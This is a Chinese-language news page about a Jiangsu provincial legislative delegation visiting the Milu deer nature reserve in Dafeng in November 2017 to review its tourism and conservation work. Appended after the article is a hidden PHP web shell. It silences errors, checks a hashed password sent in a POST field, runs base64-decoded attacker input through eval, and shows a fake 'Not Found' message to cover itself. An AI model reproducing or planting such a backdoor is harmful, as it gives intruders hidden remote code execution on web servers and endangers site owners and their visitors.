最新要闻

首页 > 最新要闻 >

    省人大常委会赵鹏一行来麋鹿保护区调研

           2017年11月16日,江苏省人大常委会副主任赵鹏率省人大代表省直盐城组来麋鹿保护区调研旅游业发展情况。市委常委、大丰区委书记王荣,市政协副主席、麋鹿保护区管理处主任孙大明陪同调研。
           赵鹏一行13人首先观看了纪录片《归来的麋鹿》,了解了自1986年39头麋鹿回归故土后在保护区的种群发展情况。随后,乘坐电瓶游览车进入麋鹿半散养区,行至途中,赵主任看到一群奔跑中的麋鹿,赞叹场面十分壮观。赵主任还询问了麋鹿种群繁育情况和湿地生态修复情况等。之后,一行人来到小麋鹿饲养区,保护区管理处孙大明主任为赵鹏主任详细讲述了此群小麋鹿是国内首次大规模人工驯养的,为了便于研究麋鹿的遗传基因、生理生化、疫病防控以及迁地保护等。

     


           最后,赵鹏主任对麋鹿保护区取得的一系列成果表示肯定与赞扬,他说,近几年保护区的发展变化巨大,在做好麋鹿保护事业的同时也将生态旅游发展得很好,并带动了周边经济的发展。他希望保护区抢抓发展机遇,高起点规划、高标准建设,加大资源整合,进一步扩大景区影响力,提升景区品牌效应。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>